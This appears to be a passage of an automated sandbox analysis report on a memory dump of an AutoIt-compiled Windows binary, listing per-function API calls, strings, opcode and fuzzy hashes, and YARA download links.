Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fb4f7f1bea1a42fa1e57f60fbe48d5497cde5ee528ed2ad38ca09d40fc340933
Instruction ID: 42c17dca707a5cbabbec2fb9698b91e105acb9a9b17d9a6a642873fa492ee70a
Opcode Fuzzy Hash: fb4f7f1bea1a42fa1e57f60fbe48d5497cde5ee528ed2ad38ca09d40fc340933
Instruction Fuzzy Hash: 98E0527E104505FFDA019FE5EC0C95ABBA9FBCA762B50A631F32985470CB33A462DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A39A72, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 00A17652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A1758C,80070057,00000000,00000000,?,00A1799D), ref: 00A1766F
Part of subcall function 00A17652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018), ref: 00A1768A
Part of subcall function 00A17652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018), ref: 00A17698
Part of subcall function 00A17652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018), ref: 00A176A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A39B1B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00A39C97
CoTaskMemFree.OLE32(?), ref: 00A39CA2

Strings

NULL Pointer assignment, xrefs: 00A39CF0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 4175897753-2785691316
Opcode ID: aeeddd7c28c2af07bdcb9c154b6ed5648ddeddf9552835acaef49d9e9639790c
Instruction ID: c49c876c78e1925a38f237d34d10c5bb4000a82704deffa3fda52511f4cc979f
Opcode Fuzzy Hash: aeeddd7c28c2af07bdcb9c154b6ed5648ddeddf9552835acaef49d9e9639790c
Instruction Fuzzy Hash: 91912471D00229AFDB10DFA5DC85EDEBBB8EF48710F20416AF419A7281DB716A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A38902, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A38928
CharUpperBuffW.USER32(?,?), ref: 00A38A37
VariantClear.OLEAUT32(?), ref: 00A38BAF

Part of subcall function 00A27804: VariantInit.OLEAUT32(00000000), ref: 00A27844
Part of subcall function 00A27804: VariantCopy.OLEAUT32(?,00000000), ref: 00A2784D
Part of subcall function 00A27804: VariantClear.OLEAUT32(?), ref: 00A27859

Strings

AUTOIT.ERROR, xrefs: 00A38A3D
Incorrect Parameter format, xrefs: 00A38960, 00A38B22

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: efa06eedf920fdb94c936f459792a99a91d468527082f5fff26c937fe3336d9e
Instruction ID: 39b7bac2e2ff63235bfacc61b84ae3d8233d84729ae8d97e65e54ea3c46724c0
Opcode Fuzzy Hash: efa06eedf920fdb94c936f459792a99a91d468527082f5fff26c937fe3336d9e
Instruction Fuzzy Hash: 09919D75A083019FC700DF28C484A5ABBF4EFC9354F04896EF89A8B361DB31E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A1DA5D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000018,00A52C2C,00000005,00000028,?,?,00000001,?,?,00000000,00000000,00000000,?,00A38639,?,00000000), ref: 00A1DAC5
SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00A38639,?,00000000,00000000), ref: 00A1DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A1DB0C
SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00A38639,?,00000000,00000000), ref: 00A1DB8E

Strings

DllGetClassObject, xrefs: 00A1DB01

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 6e86992199ba804b96f5ff4b613b517b30ca28a966f9bfc15d478253bf75b0d8
Instruction ID: bf51f6f06e78731e917d0bd9e92c1701ddb68e5c1bbf4ac02b18dcd61e1de0fc
Opcode Fuzzy Hash: 6e86992199ba804b96f5ff4b613b517b30ca28a966f9bfc15d478253bf75b0d8
Instruction Fuzzy Hash: 47418DB2508208EFDB15CF68CC84AEB7BB9EF45350F11859AF9059F145D7B2DA80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A3DAB9, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A3DAD9

Strings

cdecl, xrefs: 00A3DB30
none, xrefs: 00A3DBB4
winapi, xrefs: 00A3DB4A
stdcall, xrefs: 00A3DB5B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 2a80fb0784607a1c9fa3821af83be04aa0186fa1e6e242ca991fcc69b4844533
Instruction ID: da7aa395bb43fe1f41012d378cf4f293f042c6b10bf661e83cd3766c90222bdf
Opcode Fuzzy Hash: 2a80fb0784607a1c9fa3821af83be04aa0186fa1e6e242ca991fcc69b4844533
Instruction Fuzzy Hash: B7316071900219EFCB10DF94DC81EEAF7B4FF45360B108A2AF465A76D1CB71A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A19372, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1B0C4: GetClassNameW.USER32 ref: 00A1B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A193F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A19409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00A19439

Strings

ListBox, xrefs: 00A193B5
ComboBox, xrefs: 00A19380

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ClassName
String ID: ComboBox$ListBox
API String ID: 787153527-1403004172
Opcode ID: 54eee14671a81c9702c8101cd5ca2a644ef83b18647e18b065140afb9406dec8
Instruction ID: bd3f2df052528fd20af43808046ca7b0acd19ebdd4dd55d575229ec325f0118b
Opcode Fuzzy Hash: 54eee14671a81c9702c8101cd5ca2a644ef83b18647e18b065140afb9406dec8
Instruction Fuzzy Hash: 24210475900104BEEB04ABB0DC96EFFB77CDF823A0B10811DF425971E1DB351A8ADA20

Uniqueness

Uniqueness Score: -1.00%

Function 00A2703E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C,00000001,?,?,?,00A3FC38), ref: 00A2705E
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000001,?,?,?,00A3FC38), ref: 00A27091
GetStdHandle.KERNEL32(0000000C,00000001,?,?,?,00A3FC38), ref: 00A270A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000,?,?,?,00A3FC38), ref: 00A270DD

Strings

nul, xrefs: 00A270D8

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: b507139a0b31f6b3848ab6e0d77487211ab6f792c83e6f1fa91291dcd2a2011c
Instruction ID: 8518d2b957cce4637d28983641940fb641bb6a7615f12222e16e5ceb5259eacc
Opcode Fuzzy Hash: b507139a0b31f6b3848ab6e0d77487211ab6f792c83e6f1fa91291dcd2a2011c
Instruction Fuzzy Hash: 4C217F75508229ABDB209F78EC05E9E77B8AF55321F204A39F9A0D72D0D77199448B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A2710C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A2712B
CreatePipe.KERNEL32(?,?,0000000C), ref: 00A2715D
GetStdHandle.KERNEL32(000000F6), ref: 00A2716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080), ref: 00A271A8

Strings

nul, xrefs: 00A271A3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 2a121d84e178c1bcc1e9f77fcb9aa1fe8e5db9c2756ae533ceef1903136c39fc
Instruction ID: 6b1caa1274f9349963c97c30a3ab56913dca0daebedd83377ac6ddb223b6a288
Opcode Fuzzy Hash: 2a121d84e178c1bcc1e9f77fcb9aa1fe8e5db9c2756ae533ceef1903136c39fc
Instruction Fuzzy Hash: B421A475504225AFDB209F6CAC04E9EB7A8AF51730F200B29F9A0D72E0DB71A951C760

Uniqueness

Uniqueness Score: -1.00%

Function 00A46656, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C1D35: CreateWindowExW.USER32 ref: 009C1D73
Part of subcall function 009C1D35: GetStockObject.GDI32(00000011), ref: 009C1D87
Part of subcall function 009C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 009C1D91

SendMessageW.USER32(00000000,00000467,?,?), ref: 00A466D0
LoadLibraryW.KERNEL32(?,?,?,?,?,SysAnimate32,?,?,?,?,?,?,?,?), ref: 00A466D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A466EC
DestroyWindow.USER32(?,?,?,?,?,SysAnimate32,?,?,?,?,?,?,?,?), ref: 00A466F4

Strings

SysAnimate32, xrefs: 00A466AB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 8c05195757a32cac8c72f5372a6379859a5bec174021f1218d45efb8717fe2df
Instruction ID: 2342162dca50e5bf66b7028c1466fbd6b23260388c1a4d5f97515690fdbf704e
Opcode Fuzzy Hash: 8c05195757a32cac8c72f5372a6379859a5bec174021f1218d45efb8717fe2df
Instruction Fuzzy Hash: 2F216FB9100205BFEF148FB4EC80EBBB7ADEB9A368F114629F91192190D7719C519762

Uniqueness

Uniqueness Score: -1.00%

Function 00A22017, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A22048

Strings

APPEND, xrefs: 00A22081
KEYS, xrefs: 00A2205F
REMOVE, xrefs: 00A2204E
EXISTS, xrefs: 00A22070

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: dd8275936bb89506847bf83e49eb74d9e83bec7c7bdc198a2c288a08a59d0176
Instruction ID: 363d53fe59c1d13440e7f77077ce511b164f3903853610006bcd5fea7a6dad65
Opcode Fuzzy Hash: dd8275936bb89506847bf83e49eb74d9e83bec7c7bdc198a2c288a08a59d0176
Instruction Fuzzy Hash: 0311A130940119EFCF00EFE4DD40AEEB3B0FFA5300B508568D85967291DB326D46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A293DF, Relevance: 7.8, APIs: 5, Instructions: 332fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,-00002474,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A296DC
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00A29785
CopyFileW.KERNEL32(?,?,?,-00002474,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A2979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A297AC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A297BE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: c0ccc4e9de70508a66e01b834439560af489fb3a306b60c2d04bc21ee9cd2247
Instruction ID: 1e313b66cce5148692eadd2375a4bf024bcc422ac7f4cab354c2ab85b9963acc
Opcode Fuzzy Hash: c0ccc4e9de70508a66e01b834439560af489fb3a306b60c2d04bc21ee9cd2247
Instruction Fuzzy Hash: 23C138B1D00129AEDF21DFA5DD85EDFBBBCEF85310F0040AAF609E6151DB709A848B65

Uniqueness

Uniqueness Score: -1.00%

Function 00A3EE69, Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A3EF1B
GetProcessIoCounters.KERNEL32 ref: 00A3EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A3F07E
CloseHandle.KERNEL32(?), ref: 00A3F0FF

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 596862c521947763783a729f9ea3e1b953dd0b08f4fe4e91c5fd8961e289171d
Instruction ID: 089dba7ddbd4cabf54ec1c4f56847ea079a2577aedd328c2d809f0dd08af6d5e
Opcode Fuzzy Hash: 596862c521947763783a729f9ea3e1b953dd0b08f4fe4e91c5fd8961e289171d
Instruction Fuzzy Hash: A981A671A047009FD720EF28C946F6AB7E5AF88710F04881DF59ADB3D2DBB0AD408B52

Uniqueness

Uniqueness Score: -1.00%

Function 009ED812, Relevance: 7.7, APIs: 5, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 009E9E4B: EnterCriticalSection.KERNEL32(?,?,009E9CBC,0000000D), ref: 009E9E76

@_EH4_CallFilterFunc@8.LIBCMT ref: 009ED84C
GetStartupInfoW.KERNEL32(?,00A7BF10,00000064,009E7F27,00A7BD38,00000014), ref: 009ED8A5
GetFileType.KERNEL32(00000001), ref: 009ED939

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CallCriticalEnterFileFilterFunc@8InfoSectionStartupType
String ID:
API String ID: 2341069899-0
Opcode ID: fb2f09a19ca1cba0573ab41d4da1bc91106658ce82680d8c6a9b518d1ce288a2
Instruction ID: 83a915536f362a06e5917e8d483bf454e8a59dc03fd5eaf073c2babec129d47b
Opcode Fuzzy Hash: fb2f09a19ca1cba0573ab41d4da1bc91106658ce82680d8c6a9b518d1ce288a2
Instruction Fuzzy Hash: 80911971D062819EDB21CFA5DC416ADBBF4EF4A324B24466ED4A6AB3D1D7349D03CB10

Uniqueness

Uniqueness Score: -1.00%

Function 009EF19E, Relevance: 7.7, APIs: 5, Instructions: 217COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(009E70B8,00000000,?,?,00000000,00000000,00000100,7FFFFFFF,00000000,?,?,?,009EF3D4,00000000,?,00000000), ref: 009EF207
MultiByteToWideChar.KERNEL32(009E70B8,00000001,?,?,00000000,00000000,?,?,?,009EF3D4,00000000,?,00000000,?,?,?), ref: 009EF287
WideCharToMultiByte.KERNEL32(009E70B8,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 009EF376
__freea.LIBCMT ref: 009EF37F

Part of subcall function 009E594C: __FF_MSGBANNER.LIBCMT ref: 009E5963
Part of subcall function 009E594C: RtlAllocateHeap.NTDLL(013A0000,00000000,?,00000000,?,?,?,009E1013,?), ref: 009E598F

__freea.LIBCMT ref: 009EF386

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeap
String ID:
API String ID: 1055080620-0
Opcode ID: 76f1e7fb0fe4aacef3674a2d018fb260816183aeb56f37312c57e1637342d2cd
Instruction ID: a4da71675c3fd5e3dd2e032f5018a3740f0eee9006395c41771bccbe8930e765
Opcode Fuzzy Hash: 76f1e7fb0fe4aacef3674a2d018fb260816183aeb56f37312c57e1637342d2cd
Instruction Fuzzy Hash: 1F51D17250118ABEDF268F96DC55EBF3B6DEB853A0F11063BFA15E2190DB359C008760

Uniqueness

Uniqueness Score: -1.00%

Function 00A1F3DD, Relevance: 7.7, APIs: 5, Instructions: 162COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A1F3F7
VariantClear.OLEAUT32(00000013), ref: 00A1F469
VariantClear.OLEAUT32(00000000), ref: 00A1F4C4
VariantClear.OLEAUT32(?), ref: 00A1F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A1F569

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 2d07290c2d17afcf7f173514d9e2b7804c04cdd7e5b51555ac525bfa096c5f5a
Instruction ID: 3f889432949891bd9f4133eae860cb76683a6dbbb33358b3660b2d05d0a559d5
Opcode Fuzzy Hash: 2d07290c2d17afcf7f173514d9e2b7804c04cdd7e5b51555ac525bfa096c5f5a
Instruction Fuzzy Hash: 2E515BB5A00249AFDB10CF58D880EAAB7F9FF4C354B158569E959DB300D731E952CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A402C2, Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A40038,?,?), ref: 00A410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A40388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A403C7
RegEnumKeyExW.ADVAPI32 ref: 00A4040E
RegCloseKey.ADVAPI32(?,?), ref: 00A4043A
RegCloseKey.ADVAPI32(00000000), ref: 00A40447

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: e77096011629da7ad8179860d2a5b5179adaaf2ee124424df27748f3882c01c1
Instruction ID: 257dd8adc150a228d7f2d0c521438c779945ed841fae893a8e88756f615d664e
Opcode Fuzzy Hash: e77096011629da7ad8179860d2a5b5179adaaf2ee124424df27748f3882c01c1
Instruction Fuzzy Hash: A0513A35608204AFD704EFA4D885F6EB7E8FFC4704F04892DB6958B2A2DB71E905DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A226F9, Relevance: 7.6, APIs: 5, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A22792
IsMenu.USER32(00000000), ref: 00A227B2
CreatePopupMenu.USER32(?,?,?,?,?,?,?,?,?,?,?,?,013B9828,?,?,00000000), ref: 00A227E6
GetMenuItemCount.USER32(000000FF), ref: 00A22844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A22875

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID:
API String ID: 93392585-0
Opcode ID: ff569fda6922e0565f92f3c3618f65fed6a23a2f09041ce898c85c7352014ccc
Instruction ID: 95a39c67a8d1ca8cfbc8f4f89b47c6ce1db00c600999d77ae01dd2b6065ece86
Opcode Fuzzy Hash: ff569fda6922e0565f92f3c3618f65fed6a23a2f09041ce898c85c7352014ccc
Instruction Fuzzy Hash: 26519A7090426AFFDB25CFACE988BAEBBF4EF45314F104239E4119A290D3718904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A3DBDC, Relevance: 7.6, APIs: 5, Instructions: 144libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?), ref: 00A3DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00A3DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00A3DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00A3DD1B
FreeLibrary.KERNEL32(00000000), ref: 00A3DD35

Part of subcall function 009C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,80020004,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00A27B20,00000000,80020004,00000000), ref: 009C5B8C
Part of subcall function 009C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,80020004,?,00000000,80020004,00000000,00000000,00000001,?,00A27B20,00000000,80020004,00000000,?,00000001), ref: 009C5BB0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 56d4ef662036ce8b36bc3671a1b07473ae48350688249043077ea9bed6f3148d
Instruction ID: d96cd5fe81b03dd0ff1aad6ef9da5f888ca25e56cc2d5cd014a69681919934fc
Opcode Fuzzy Hash: 56d4ef662036ce8b36bc3671a1b07473ae48350688249043077ea9bed6f3148d
